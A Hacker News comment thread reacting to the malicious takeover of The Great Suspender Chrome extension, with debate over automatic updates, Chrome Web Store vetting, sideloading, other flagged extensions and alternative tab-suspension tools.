| extensions, duo introduced CRXcavator (https://crxcavator.io/) a
| while back, which does some risk scoring around permissions. It
| is chrome-only, and it doesn't protect against this type of
| attack specifically, although you can look at the Potential
| External Communication section for possible issues.
| mkj wrote:
| It seems auto-updating browser extensions are riskier than
| leaving them non-updated?
| netsharc wrote:
| It'll be a "great" day when someone manages to do big damage
| with code that Google hosted and delivered to the victims...
| IMO it's just a matter of time.
| SiteRelEnby wrote:
| Blindly letting _anything_ auto-update.
| AQXt wrote:
| ...which happens all the time in the free software world,
| when you type `apt-get|yum|brew update`.
|
| What are the odds of one dependency being taken over by a
| shady anonymous entity?
| mad182 wrote:
| Packages in the default repos for some large Linux distro
| are usually reviewed and tested by many people until they
| make it into updates for current stable version, so while
| it's probably not entirely impossible for some malicious
| code to get in, it seems pretty unlikely. Unlike browser
| extensions, where the current owner can upload anything
| they want and it's pushed to the users without them even
| knowing.
| AQXt wrote:
| How about `npm`, `pip`, `cpan`?...
|
| We have seen bad updates breaking the entire Javascript
| ecosystem, but they were not intentional.
|
| All it takes to inject a bad dependency is a burned out
| developer willing to delegate his free project to someone
| else...
| SiteRelEnby wrote:
| It's more the chance of an unexpected breaking change. When
| you use a package manager, you're _expecting_ stuff to
| change (and get to review what 's changing).
|
| Upgrading manually regularly: Good idea.
|
| Having a cronjob to do it automatically without user
| intervention: Bad idea.
| Snarwin wrote:
| The fact that you have to manually type in `apt-get update`
| (or similar) means it's not automatic. You have full
| control over when the update takes place, and which
| packages get updated.
| spiffytech wrote:
| When discussing software updates, I feel like folks on HN
| commonly overestimate how much impact opportunity for
| controlling updates has. I haven't seen someone in my
| social/professional circles ever hesitate before applying
| an apt-get update. Nobody I've known checks changelogs
| (except developers checking on direct dependencies),
| nobody reads the patches for the updates to verify
| nothing malicious slipped in. "There's an update, I'd
| better apply it, unless it smells like a breaking
| change."
|
| So in practical terms, my experience is that vanishingly
| few people will behave differently than an auto-update
| system would behave, except in rare occasions like a
| malicious update making the headlines. We definitely need
| a solution for rejecting malicious updates, but I feel
| backing away from auto updates throws the baby out with
| the bathwater and would be a net-negative change for the
| industry and for users.
| traviscj wrote:
| There's also the occasional _necessity_ for making a
| breaking change, in particular _breaking some exploit_
| and thereby making the software more secure.
|
| I don't envy Chrome leadership's decision or having that
| problem to solve.
| shawnz wrote:
| I don't think the question is about control but rather
| whether automatic updates, when intentionally activated
| by the user, contribute more positively to the system's
| security than negatively.
|
| Without automatic updates, you might be more inclined to
| put off a patch which turns out to be urgent. Or you
| might be more likely to lose track of which patches have
| been applied across your various systems.
| spiffytech wrote:
| Auto-update is a mixed bag. We got into auto-update as a
| standard practice over the last decade because a large
| fraction of users never updated anything, so security issues
| would linger forever (not to mention ancient software
| versions holding back platform technologies, and financial
| concerns for software shops).
|
| So it's not that auto-update is flatly a bad idea, it's more
| that it's a trade-off that sometimes makes security issues
| almost evaporate, and sometimes makes them impossible to
| dodge.
| mkj wrote:
| I think the difference with browser extensions is the
| anonymity and speed of changing owners. There's more momentum
| to notice big companies going downhill (+- stuff like
| sourceforge)
| Anthony-G wrote:
| I recently had to install Certbot on a CentOS 8 server and
| discovered that the Certbot documentation recommeds using Snap
| (for almost every popular GNU/Linux release). They have their
| reasons[1]. I figured it was time to investigate using Snap and
| the benefits it could provide.
|
| While researching, I found many users reporting that forced
| updates of software installed by Snap caused many problems and
| I decided against using it; I was able to install Certbot via a
| good old-fashioned RPM from EPEL.
|
| I also removed Snap from a different Ubuntu server which had
| recently been upgraded to 20.04 (I wasn't using LXD on that
| server so there was no need for it).
|
| 1. https://community.letsencrypt.org/t/how-to-install-
| certbot-w...
|
| FWIW, I've been allowing Apt and Yum package managers to
| automatically update for about 8 years without any problems.
| The only manual OS updating I do is for a set of physical (non-
| virtual) servers that are operational 24/7.
| nakodari wrote:
| Thanks for this! I've been using this extension for a long time
| and just removed it today. Honestly, with Macbook Air M1 there is
| no need for suspending tabs any more because the battery life is
| amazing, so that also helps.
| weakboi wrote:
| Ironically, I tracked the real world identity of someone using
| stolen credit cards in my ecom site BECAUSE he posted a
| tutorial/how-to on YouTube showing the vulnerability tool (script
| kiddie), under his real name. SMH. This won't stop this
| information from being disseminated, but it may save some idiots
| from themselves.
| mendelmaleh wrote:
| I expected this to be about Jack Dorsey/twitter xD
| Androider wrote:
| In Chrome, make sure you set your less frequently used extensions
| to run "On click" instead of "On all sites". Extensions ->
| extension details -> Site access.
|
| For dev tools and such, I set a whitelist of the sites they're
| allowed to run on, using that same extension details page.
| There's no need for your JSON formatter etc. to run on every
| single page you visit. Also speeds up browsing.
| brundolf wrote:
| Among other things, this is why when people say "HN doesn't need
| a dark mode, just use an extension", that isn't a valid solution.
| For years now I've refused to install any extensions that aren't
| too-big-to-compromise (which in practice - for me - means AdBlock
| Plus and maybe React Dev Tools), and that should be everyone's
| policy. Any extension whose compromise wouldn't damage the
| reputation of a billion-dollar organization is simply too juicy
| of an attack vector.
| raunakdag wrote:
| It's funny you mention AdBlock Plus but not uBlock Origin in
| this situation. I'd say the latter is much, much better than
| the former.
| brundolf wrote:
| But is it better _known_? That 's the determining factor
| here. The Great Suspender was well-regarded in certain
| circles, and even fairly well-known (I've never used it but
| I've heard of it). But even it apparently wasn't above
| compromise. To be reasonably safe, an extension has to either
| be a) so well-known that they'd never be able to get away
| with silently adding malware (because someone would notice,
| which to be fair is what happened here), or b) tied to a
| major brand that wouldn't want to sell out to some shady
| firm, on PR grounds alone.
| bijant wrote:
| This is really Google's fault. They make it impossible to turn
| off automatic updates for Chrome extensions from their store.
| That would be kind-of-ok if they actually had a rigorous approval
| process. But they don't. The Chrome Web Store has become one of
| the prime Vectors for malware. The only way to be safe is to
| exclusively download releases from the extensions github repo and
| to manually install them.
| Kagerjay wrote:
| I never even patch automatic updates to my OS either (e.g. OS
| bigSur). I'd rather not guinea pig the latest updates and they
| usually don't add all that much value for chrome extension
| releases either, so a way to turn off automatic updates in
| chrome is highly desirable for me.
|
| Download and unpacking from github is a pita, I'd need to do
| this to each of my computers seperately
| smt88 wrote:
| This is a terrible security practice.
|
| Switch to Chromium and use a package manager to stay up to
| date. Don't freeze updates, especially on your browser.
| sokoloff wrote:
| I work in software. I know the dangers of a day 0 exploit.
| I also know the dangers of an x.0 release of software.
|
| Security is often in tension with convenience/usability (as
| in this case).
|
| Concretely: I don't update to the latest MacOS day of
| release. I do update after a few weeks of "no significant
| issues reported" (or I'll update manually faster if I learn
| of a serious exploit). I still haven't updated to BigSur as
| some of the software that I rely on doesn't work on BigSur
| yet, so I'm on the latest patch of Catalina.
| jrochkind1 wrote:
| I'm not going to update to a new MacOS "named" release
| until it's been out for a while and probably has a patch
| release or two, agreed.
|
| But I install MacOS patch releases as soon as they are
| offered. It has never caused me a problem I am aware of,
| and I don't want to miss out on security patches, or even
| just bugfixes and perf improvements.
|
| Heck, I actually just upgraded a MacBook that was still
| on 10.12, which was EOL'd. But I upgraded it _because_ it
| was EOL 'd, and wasn't getting patch releases for
| security fixes, and I want those patch releases as soon
| as they are released!
| smt88 wrote:
| You should let clients and users know that you care more
| about convenience than security so that they can make an
| informed decision about whether to trust their data with
| you.
|
| I don't know what x.0 software updates you're talking
| about (Chrome or Mac), but my comment never mentioned
| any. You don't seem to know that browser vendors don't
| really do those like OS vendors do. Either way, you can
| still avoid those while gettong security updates.
|
| In my memory, there hasn't been a breaking auto-update in
| Chrome in years, but there have been hundreds of 0-days.
| The numbers don't really work out for the tradeoff you
| claim to be making.
| simias wrote:
| I don't think turning automatic updates would be the right way
| to deal with this. See: Windows. If a piece of software becomes
| malware it needs to either be forked or retired completely,
| running unmaintained legacy versions of software is not
| sustainable.
|
| I have plenty of things I want to complain about when it comes
| to Google's user-adversity but mandatory automatic updates is
| definitely not one of them.
|
| If you're a technical user and really know (or really think
| that you know) what you're doing there are ways to effectively
| freeze a given version of an extension.
| [deleted]
| sn_master wrote:
| Or just add permissions and ask the user when the extension
| asks for new ones? e.g. permission to talk to the outside world
| that something like TGS shouldn't need to just do its job.
| LegitShady wrote:
| >The only way to be safe is to exclusively download releases
| from the extensions github repo and to manually install them.
|
| Or not use chrome
| metalliqaz wrote:
| The fact that Google has not addressed this gaping security
| hole in Chrome is borderline criminal.
| stevenhuang wrote:
| You can do better to voice your displeasure by not stretching
| credulity.
| metalliqaz wrote:
| It's hyperbole. Welcome to the Internet.
| AlexandrB wrote:
| In general, taking control away from users sets up all kind of
| bad incentives. For example, automatic updates with no way to
| downgrade save vendors from having to compete with their own
| older versions. This means regressions in functionality or
| design can be pushed out with little recourse for users other
| than complaining online. This is compounded by ecosystem lock-
| in and lack of data portability. The software industry as a
| whole is heading towards treating users more and more
| paternalistically.
| duxup wrote:
| On the other hand users are generally pretty poor at managing
| software themselves and as long as it works they'll happily
| and probably ignorantly run something that is not secure
| already and needs an update.
| CaptArmchair wrote:
| > users are generally pretty poor at managing software
|
| This is an assertion which begs many questions.
|
| Who are these users? What do you mean by "generally"? What
| do you mean by "poor"? What do you mean with "managing
| software"? Which software specifically? Why is "managing
| software" hard? What are specific case where this might be
| true? Is this statement falsifiable?
|
| For instance, how does age, social background, education
| level, language, culture,... factor into the experience of
| "managing software"? Sure, the problem can't be software
| itself in it's entirety?
|
| See, statements like these tend to break down once you
| start digging into the murky nuances and specificities of
| reality.
|
| Moreover, accepting them at face value tends to reinforce a
| belief which isn't based on fact: that the users of digital
| technology can't manage their devices, and therefore
| shouldn't be confronted with managing their devices.
|
| ... which is then translated and implemented in interfaces
| and systems that simply lack the functionality that gives
| users fine grained control over what is or isn't installed.
|
| Over a longer term, this promotes a form of "lazy thinking"
| in which users simply don't question what happens under the
| hood of their devices. Sure, people are aware of the many
| issues concerning privacy, personal data, security and so
| on. But ask them how they could make a meaningful change,
| and the answers will be limited to what's possible within
| the limitations of what the device offers.
|
| A great example of this would be people using a post-it to
| cover the camera in the laptop bezel.
|
| People don't know what happens inside their machine, they
| don't trust what happens on their machine, and there's no
| meaningful possibility to look under the hood and come to a
| proper understanding... so they revert to the next sensible
| thing they have: taping a post-it over the lens.
|
| The post-it doesn't solve the underlying issue - a lack of
| understanding which was cultivated - but it does solve a
| particular symptom: the inability to control what that
| camera does.
| strken wrote:
| I, and everyone else I know, do not install updates to
| our software in a timely manner unless we actively need a
| feature.
|
| Users are "I, and everyone else I know".
|
| Generally is "unless we need a feature".
|
| Poor is "do not install updates to our software".
|
| Managing software is "install updates".
|
| Software is any software we use that provides updates,
| which is all of it.
|
| Managing software is hard because doing it manually would
| require checking the website of every piece of software
| you've ever downloaded at regular intervals, where
| regular could be as frequently as minutes for security-
| critical tools.
|
| If I ever downgrade my software and lock it to a specific
| version, I am now managing it manually, and all of the
| above applies.
|
| I honestly don't think there are unquestioned assumptions
| here, because the task of keeping security-critical
| software up to date manually is nearly impossible for any
| user.
| devonbleak wrote:
| It really doesn't beg those questions - we have 25+ years
| of data backing it up. People across the board are bad
| about running updates. I'm guessing you missed the mid-
| late 90s when things like buffer overflows started to be
| exploited and firewalls became necessities because even
| the folks whose job it was to run updates of vulnerable
| systems with public IPs on the Internet... weren't. Then
| came the early 2000s and all the worms running amok
| because people still weren't running their updates. Then
| the collective web development industry screamed in pain
| because things like Windows XP and IE6 just would not
| die.
|
| The collective Internet has been through this before and
| (mostly) learned its lesson. People don't run updates
| when it's not shoved down their throat. And it's not a
| small segment of people. And it hasn't changed. Look at
| how many hacks still happen because of servers and apps
| that aren't patched for known vulnerabilities. Or the
| prevalence of cryptojacking which is still largely based
| on known vulnerabilities that already have patches
| available - indicating it's successful enough that people
| keep doing it.
|
| Most users don't question what happens under the hood of
| their devices because they don't care. They have other
| things to care about that actually mean something to them
| besides the nuances of the day to day maintenance of
| their devices. There does not exist an effective way of
| making people care about things like this, let alone
| educating the masses on how to appropriately choose which
| commit hash of their favorite browser extension they
| should really be on. How many security newsletters do you
| really expect the average person to be subscribed to in
| order to make informed decisions about these things?
|
| Hell my "Update" notification on Chrome is red this
| morning and I'm at least in the top 10% of security-
| conscious folks in the world (it's really not a high
| bar).
|
| I'm not saying automatic updates are without their
| problems - I'm in a thread on HN about that exact thing.
| But trying to claim it's somehow about sociodemographic
| issues and the answer is solving that and going back to
| selectively running updates is just ignoring the lessons
| of the past.
| duxup wrote:
| I honestly am not at all sure what you mean by much of
| that.
|
| Demographics don't change the fact that if you don't
| automatically update software, many users simply won't.
| That's bad.
| jjkaczor wrote:
| ... in the usual pedantry of HN your use of "poor" was
| interpreted to mean socio-economic, rather than... "just
| bad at something"...
| duxup wrote:
| Oh I see. That's, weird, but thanks for letting me know.
| Someone wrote:
| I don't see how one could parse _"On the other hand users
| are generally pretty poor at managing software
| themselves"_ and assign that interpretation to _"poor"_.
| duxup wrote:
| I agree, but the user who responded to me seemed to talk
| about demographics as if I had meant "poor" as in not
| having much money.
|
| The internet is global, sometimes I think things get lost
| in translation.
| wolco5 wrote:
| That would cover users who are poor at managing software.
| Being able to turn them off would require someone to be
| good at managing software. Why remove control from those
| users?
| duxup wrote:
| I want to think that folks who would chose that option
| would be responsible, but the amount I hear from other
| developers who defer updates on Windows 10 to the maximum
| (1 year...) and still are upset when they have to reboot
| makes me think that even experienced users present a
| risk.
| ziml77 wrote:
| I don't _want_ to be saying that we should remove
| control, but I actually do think it 's reasonable to.
| Even on a single-user device, security issues are not
| isolated. An infected machine will likely be used for
| things like spam and DDOS.
|
| If you make something available for people to toggle that
| improves their experience, people are going to take
| advantage of that even if they don't really grasp or
| decide to ignore the consequences. In the case of updates
| the improved experience is not being nagged or forced to
| restart an application or the whole OS. And unfortunately
| the only way to really gatekeep that control to people
| who know what they're doing is giving it enterprise
| pricing.
| iamben wrote:
| Conversely, before automatic updates web developers were
| stuck supporting Internet Explorer for the best part of
| twenty years. Many of the people using it had neither reason
| or knowledge to update it, and it became the reason my
| parent's computers got riddled with malware.
|
| There's a sensible middle ground here. Take the paternalistic
| approach that (generally) protects people like my mum. Add
| settings that allow people like you and me to turn off
| updates or roll backwards. Push the people controlling the
| updates (like the Chrome store) to better protect their
| users.
| marcosdumay wrote:
| Internet Explorer was only replaced by automatic updates
| _after_ its usage felt enough that sites stopped supporting
| it.
| ryandrake wrote:
| Users need to be motivated to upgrade. If their current
| software works sufficiently on the sites they care about,
| then they have no need to upgrade. If the sites themselves
| are enabling this behavior, by bending over backwards to
| work on with old browsers, then they are part of the
| "problem".
|
| I don't like automatic updates and generally keep them
| disabled. Software upgrades tend to reduce functionality
| and instead force unnecessary UX redesigns on users, so I'd
| rather avoid them. I _wish_ developers had the [EDIT:
| incentive] to release security patches independently from
| functionality changes, but few do that anymore, sadly.
| ComodoHacker wrote:
| >I wish developers had the competence to release security
| patches independently from functionality changes, but few
| do that anymore, sadly.
|
| You do realize it's not competence developers are
| lacking, it's resources that are finite, do you?
| iamben wrote:
| It's been an age since I've worked in an agency, but back
| in the IE era, at least once a month a dev would ask to
| use a 'modern feature'. Something to support some a new
| piece of design from the design team, or save hours or
| days of dev, or remove the need for hacky 'fixes' that
| could be done cleanly with modern browser support.
|
| So off to analytics they would go. "X thousand users are
| using IE8. We're converting at X%. Removing support for
| IE8 just means these people will shop elsewhere and we'll
| lose X thousand pounds a month. You need to support IE8."
|
| Believe me, I wish it was as simple as saying developers
| are "part of the problem," because it would be an easy
| fix. But try selling that (without a huuuuge struggle!)
| to the person who holds the purse strings.
|
| Sadly the new features usually only came on new sites.
| It's much easier to push it through when you're not
| cutting off an existing income stream.
| corty wrote:
| Despite automatic updates, web developers are still stuck
| with Safari, IE, old android browsers and old edge.
| Automation doesn't help with bugs and functionality if
| there are just no updates to be installed that fix bugs and
| bring new functionality.
| username90 wrote:
| The major problem with internet explorer was that it was
| impossible to update without updating windows which costs
| money so most people and organizations didn't do it.
| mikewarot wrote:
| >Conversely, before automatic updates web developers were
| stuck supporting Internet Explorer for the best part of
| twenty years. Many of the people using it had neither
| reason or knowledge to update it, and it became the reason
| my parent's computers got riddled with malware.
|
| The failure is not that of Internet Explorer, but rather
| the OS in which it runs, which has a faulty security model.
| No operating system should trust executables with
| everything by default.
| Spivak wrote:
| It wasn't faulty at the time since people were more
| concerned about protecting computers from users than
| protecting users from applications.
|
| We all seem to forget that computing has changed
| _drastically_ in the last decade.
| ColonelPhantom wrote:
| I would say that "protecting users from applications" (or
| at least, external attackers) has been commonplace for
| maybe even two decades now, ever since major malware
| 'plagues' of the early 2000's (pre-SP2 Windows XP) like
| Blaster or Sasser.
|
| That said, in that era it was often assumed (more so than
| now) that software the user installed himself is trusted.
| Cthulhu_ wrote:
| I don't mind automatic updates per se as long as they're
| thoroughly checked and vetted. I'm not convinced Android and
| the Chrome web store do ANY checking / vetting. I have more
| trust in Apple's stores.
|
| Vetting could be better with a lot of companies as well;
| remember not so long ago when Windows Defender decided a
| critical system file was malware and broke a ton of systems?
|
| Verification. Vetting. Gradual release. Automatically disable
| extensions if they changed ownership, or if there's
| suspicious activity on the account of the owner (e.g. new
| login in another country).
|
| And they need to take a MUCH harder stance on malware. Right
| now they're not even acknowledging there's a problem, let
| alone acting on it.
| londons_explore wrote:
| For any extension that makes any money, the solution is a
| deposit scheme.
|
| "Google will withhold $1 per user of your ad revenue
| forever. If your extension is found to contain malware, you
| forfeit all the $1's. Decisions on malware'y ness shall be
| made by XYZ malware researchers."
|
| Allow a developer to get back their $1 when a user
| uninstalls the extension, or the developer stops making the
| extension. Also give the developer a certificate anytime
| showing how many $1's you hold of theirs (they could use
| that to get a loan from someone willing to trust them not
| to distribute malware).
| PetahNZ wrote:
| Not really a solution, just the minimum price a buyer
| would need to pay.
| londons_explore wrote:
| True. But even the most profitable malware won't want to
| forfeit hundreds of millions of dollars for a popular
| chrome extension.
| jrochkind1 wrote:
| Users never upgrading their software certainly also leads to
| security problems though, it's not a solution, and it is
| reasonable to try to set things up so this doesn't happen.
| ThisIsTheWay wrote:
| Wouldn't an easy solution be to turn auto updates on by
| default, and warn users that turn it off that they are
| opening themselves up to potential security issues, and to do
| so wisely?
| velosol wrote:
| The issue comes when an auto update regresses something
| that the user relied upon. As long as the automatic update
| has a 'downgrade' option that's tenable but most of the
| solutions out there make downgrading difficult.
|
| I prefer automatic updates that are presented to the user
| for action, sadly feature update/release notes are often
| hidden or content-free (cf. Google's apps' updates on the
| Play Store) and downgrading path varies heavily with OS
| (easy on Linux, impossible on iOS).
| Paul-ish wrote:
| I keep most of my extensions disabled most of the time. A lot of
| the extensions have particular uses and don't always need to be
| active.
| imedadel wrote:
| I recently switched to Auto Tab Discard.[1] It uses the browser's
| built-in tab suspending. It doesn't have all the features of TGS,
| though.
|
| Edit: OneTab[2] is also pretty good when you have lots of tabs
| open for research or work.
|
| [1]: https://github.com/rNeomy/auto-tab-discard
|
| [2]: https://www.one-tab.com/
| anotheryou wrote:
| perfect! I was looking for [1] the other day. Plays nicely with
| sideberry which uses the same api but can't do "unload all
| other tabs".
| Debug_Overload wrote:
| I've been using it for the last few weeks, and it's been pretty
| good so far. It doesn't suspend music tabs when they're not
| playing (which TGS did automatically), but nothing much to
| complain about.
| ext_dev wrote:
| Was once approached by a company who had software that would
| allow me to install affiliate links on Google Searches results by
| installing a third party on my extension.
|
| Had about 50k active users at the time and was making around
| EUR1.8k a month.[1] To be honest, users were informed on the
| install flow and most people didn't care what I was doing.
| Probably how Hola unblocker still has 8M.
|
| Google understandably told me to remove it.
|
| Donations inside extensions offer near nothing. Doesn't feel like
| a extension that can offer a paid tier.
|
| It's a dirty but effective way to generate an income stream
| relatively quickly. Even more so, if you wash your hands from it
| and walk away.
|
| I'm surprised Google hasn't taken it down completely, as it
| breaks the single use policy.
|
| [1] https://i.imgur.com/M4CD9CB.png
| SiteRelEnby wrote:
| Either the second or third time it lost all my tabs was when I
| stopped trusting it.
| frob wrote:
| Google Chrome now has tab grouping. In Beta, you can click on the
| group name and collapse the tabs. Based on their reload times, it
| seems chrome suspends the tabs in the background when you
| collapse the group.
| katsura wrote:
| Oh, this is awesome. I'm on Linux so I've been using Chromium,
| where this is already available. Pretty neat.
|
| Edit: looks like it works in Chrome as well.
| nottheonion wrote:
| This looks promising. To activate the suspend on collapse
| feature enter "chrome://flags/" into the address bar and make
| sure these experimental features are "enabled": #tab-groups,
| #tab-groups-collapse, #tab-groups-collapse-freezing. I also
| enabled: #tab-groups-auto-create.
| EGreg wrote:
| And this is why we need to rethink how we do software
| distribution.
|
| Package managers are nice for the lazy, but then we get stuff
| like this:
|
| https://qz.com/646467/how-one-programmer-broke-the-internet-...
|
| Actually you might be pulling a bunch of malicious updates in 2-3
| modules deep in your dependency tree anytime.
|
| As a society we should be moving away from a culture of
| "immediate" updates eg on Twitter etc. And go towards more "peer
| review" like in science. Otherwise we are putting responsibility
| on every individual to verify all sides of the story and get
| informed. They don't and society gets more and more dicided.
| Imagine if a scientist tweeted at 3am and half their followers
| instantly believed them. Or if an open source contributor's pull
| request was instantly accepted and pulled overnight by everyone.
| That's why USA and other countries are now so divided
| politically. Individual responsibility of 100% of the downstream
| nodes is strange to outsource responsibility to.
|
| I wrote about this back in 2012 predicting what would happen:
|
| https://magarshak.com/blog/?p=114
| Mediterraneo10 wrote:
| Recently I wanted to build one of Signal's libraries so that I
| could use it with signal-cli. It astonished me that building
| this secure messenger requires automatically downloading a
| whole host of third-party dependencies through wget from some
| disparate repositories, which presumably had received little
| vetting.
|
| What happened to the notion of using stable, centralized
| package repositories like Debian's or Red Hat's in order to
| build one's software? I did a lot of Free Software development
| in the early millennium, then was away from the scene for a few
| years, and when I came back this desire for convenience above
| all else really baffles me.
| EGreg wrote:
| At Qbix, we have built everything in-house and the few
| dependencies that we do pull in, we vetted and pinned the
| versions. People have criticized us for that in the past but
| if we are ever to get past trusting large, centralized
| entities for our server back ends, we need to make sure to
| kick the open source movement to the next level:
|
| https://qbix.com/blog/2021/01/15/open-source-communities/
|
| https://qbix.com/blog/2018/01/17/modern-security-
| practices-f...
| specialist wrote:
| Thanks for sharing.
|
| I'm now framing the problem as "inauthentic speech".
|
| > _...go towards more "peer review" like in science._
|
| Ditto journalism and reporting.
|
| This is a universal problem. The core solution remains the
| same. Cite your sources Show your work
| Sign your name
|
| WRT John Walker's screed, I really thought certificates and web
| of trust would have become the norm by now. Anything unsigned
| would be treated as gossip or worse. Certs could be revoked as
| needed.
|
| Further, every trusted digital relationship would start with a
| key exchange. Vs relying on username and password. eg Banks
| would issue me a Secure Enclave of some sort, like a USB fob.
|
| I'd like to understand why this didn't happen. My best guess is
| "Worse is better" enabled predators and parasites. Which has
| been acceptable during the gold rush.
| tus88 wrote:
| "Shady" take-over of plugins/apps is just a big a suspicious fail
| as allowing apps to gain access to all contacts on mobile phones.
|
| Google never really cared about user privacy at all.
| cwwc wrote:
| Lifesaver. Much obliged, davidfstr.
| facorreia wrote:
| That's why I don't trust Chrome extensions. There have been too
| many instances of a popular instance being taken over to run
| malware. I don't think Google's handling of these security issues
| has been adequate.
| AlexCoventry wrote:
| Is there a tool which will automatically reload _all_ your
| extensions from disk, as described in the OP? Seems like a
| sensible default, from a security perspective.
| nojito wrote:
| Sleeping Tabs is a feature on MS Edge.
|
| https://www.windowscentral.com/microsoft-edge-canary-can-put...
| bugfix wrote:
| Wow, my Chrome RAM usage went from about 2GB to 8GB after
| removing TGS.
| aitchnyu wrote:
| Why didnt browsers start warning users when an extension updated
| after changing owners?
| davidfstr wrote:
| <nope>The owner in the extension metadata on The Great
| Suspender hasn't been updated (to my understanding) so the
| Chrome Web Store doesn't even know that the owner has been
| changed.</nope>
|
| Actually it does appear that the owner was changed from
| "deanoemcke" to "thegreatsuspender" (the new mystery owner) on
| the Chrome Web Store page.
|
| I agree that warning when updating an extension if the stated
| owner has changed would be valuable.
| kburman wrote:
| Here's list of other extensions which have been recently flagged
| by community for similar behaviour
|
| - Auto Refresh Premium, static.trckljanalytic.com
|
| - Stream Video Downloader, static.trckpath.com
|
| - Custom Feed for Facebook, api.trackized.com
|
| - Notifications for Instagram, pc.findanalytic.com
|
| - Flash Video Downloader, static.trackivation.com
|
| - Ratings Preview for YouTube, cdn.webtraanalytica.com
|
| Copied from
| https://github.com/greatsuspender/thegreatsuspender/issues/1...
| sn_master wrote:
| I wonder how many of those tracking websites or even the
| extensions themselves are owned by the same entity. That's a
| pretty common practice.
| ramraj07 wrote:
| My general policy is to never install any extension that has
| full browser acceess. Except if it's from the faang companies
| themselves.
| ant6n wrote:
| I wonder whether paying for extensions could be a way to build
| more trust.
| rplnt wrote:
| Is there an extension that can track my extensions?
| jhloa2 wrote:
| I was just thinking about something similar. It would be nice
| if at a minimum, we could put together a list of compromised
| extensions. I feel like I've seen quite a few of these
| reports recently
| pault wrote:
| It should be possible to look at the source code of known
| compromised extensions and put together a list of
| heuristics that could automate part of the process.
| Minifiers make it more difficult though.
| Bayart wrote:
| You should be able to do some of that at the debug console
| level. But otherwise you're stuck tracking traffic at page
| level, at least as far as I know.
| zerd wrote:
| My wife installed an addon to be able to post Instagram posts
| from her laptop, and then suddenly clicking on google search
| results would sometimes, but not always hijack and redirect to
| bing, and then click on one of the ads. But it was clever
| because it only happened sometimes, and if she retried it it
| didn't happen, so whenever she would try to show me, it didn't
| happen. I just removed all her addons and the problem went way,
| so not sure which one it was.
| ufmace wrote:
| It's things like this that make me a lot more reluctant to
| install extensions that might be moderately convenient. Maybe
| they're okay now, but it's too much of a burden to keep track
| of what I have installed and which ones are known to be doing
| something nasty.
|
| Another loser in this whole game is the honest hobby extension
| developers, who have to deal with the power-users who might
| promote their extensions not wanting to bother for fear of not
| being able to keep a watch for potential malicious updates for
| all of them.
| AlphaWeaver wrote:
| Quick note about the workaround mentioned in this article - the
| suggestion to download the last known good version of the
| extension and sideload it is a good one, but it has some problems
| on Chrome.
|
| Chrome has features to dissuade users from installing extensions
| from outside the Chrome Web Store. If you load an unpacked
| extension, Chrome will issue an ominous warning (something like
| "this extension is untrusted, click here to uninstall") on every
| launch.
|
| One could argue this is for security, but this change was
| implemented around the same time that Google disabled the ability
| to self-host extensions that install into Chrome. Really this is
| a mechanism to shut out independent extension developers from any
| potential plausible third-party distribution method that doesn't
| rely on the Chrome Web Store (which Google controls and
| aggressively moderates.)
|
| Use Firefox.
| nousermane wrote:
| > Chrome will issue an ominous warning on every launch.
|
| That's google's shtick. They do the same if you unlock
| bootloader on your android phone. Black nag screen with scary
| text on every reboot.
| tyingq wrote:
| You could download it and publish it yourself. I have a
| extension I wrote myself, and while I occasionally see
| something about having to pay $5 in the extension management
| panel, it never forces me to do so. If they closed that hole,
| perhaps it's worth the $5 developer registration fee to some.
| AlphaWeaver wrote:
| When did you publish your extension? I'm an extension
| developer that makes a mildly popular extension used by a
| niche group (1-2k MAU) and the Chrome Web Store has tightened
| their policies over the years. It's possible that you're
| grandfathered in (and haven't hit any of the extra reporting
| requirements if you haven't updated your extension recently.)
|
| Extensions these days go through a rigorous review process,
| and Google regularly shuts down / imposes arbitrary
| restrictions against extensions due to changing policies.
|
| I understand the importance of strong moderation to protect
| users from malicious extensions, but I believe Google is
| using that as an excuse to further _lock down_ their store,
| increasing barriers to entry and making it harder for
| developers to build software to extend the most popular
| browser in the world without Google 's blessing.
| tyingq wrote:
| I hadn't looked at it for a while, so I just did so.
|
| You're right...it won't let me update it now without a lot
| of justifications on their privacy tab. However, it is
| still published. The status is "Status: Published -
| unlisted", so I can't search for it, but I can go direct to
| the store url for it.
| AlphaWeaver wrote:
| Yeah, that matches up with what I've seen. They've at
| least been decent enough not to kick people off the
| store, but I don't think it's possible to just have them
| sign / publish something unlisted these days without a
| good deal of policy writing and justifications.
|
| Yet the large actors still publish malicious updates to
| extensions. -\\_(tsu)_/-
| tyingq wrote:
| They have this "private" feature now where you have to
| list the email addresses of people that are allowed to
| use the extension. I don't see why that couldn't be
| coupled with "no review required", so long as the list is
| relatively short. But, yeah, likely will never happen.
|
| Fortunately for me, I can re-do my extension to use the
| JS postMessage api which won't require hardly any
| permissions, and thus, not much to review.
| kobalsky wrote:
| > Chrome has features to dissuade users from installing
| extensions from outside the Chrome Web Store. If you load an
| unpacked extension, Chrome will issue an ominous warning
| (something like "this extension is untrusted, click here to
| uninstall") on every launch.
|
| I've been sideloading vimium and thegreatsuspender for years
| and I haven't seen this message ever. Not on Mac nor Linux.
| squaresmile wrote:
| I'm pretty sure if you enable Extension Developer Mode, you
| won't get that nagging message on launch.
| gcatalfamo wrote:
| There is another problem by sideloading the extension: you
| don't have cloud sync anymore, thus forcing you to sideload on
| every computer you have.
| [deleted]
| TedDoesntTalk wrote:
| > Use Firefox.
|
| Firefox has similar restrictions... you have to side load
| through Developer Options. If you're not a developer, you will
| be questioning why you're doing this and the less-technically
| inclined will simply never do it (like my wife)
|
| And it is not entirely nefarious as you suggest. It limits the
| damage that sideloaded extensions did roughly 2010 and earlier.
| The WebExtension API was another assault on extensions. These
| days, chrome and Firefox have essentially closed a huge attack
| vector even though extensions are a shadow of their former
| selves. I was a skeptic for a long time (why should power users
| pay for the faults of everyone else?) but no more. Kudos.
| kibwen wrote:
| _> you have to side load through Developer Options_
|
| I'm not sure what screen "Developer Options" is referring to,
| but you can load add-ons directly from your hard drive with
| no fuss from the Add-ons page (though you must be running the
| Nightly or Developer version of Firefox). Click the gear icon
| right above your list of installed add-ons (this is also the
| menu that lets you disable auto-updates).
| driverdan wrote:
| Installing extensions from a file is supported in the
| latest mainline FF (84.0.2), nightly or dev are not
| required. I currently have one installed. It just shows a
| confirmation dialog and then installs it.
| bovine3dom wrote:
| This is true but misleading: the extension you install
| from file has to be signed by Mozilla in exactly the same
| way that extensions on the store are signed.
| Arnavion wrote:
| You can remove the signature requirement on stable by
| setting `xpinstall.signatures.required` to `false` in
| your user.js / about:config
|
| (I wrote most the extensions I installed for my own
| bespoke use, built locally as zip files and installed via
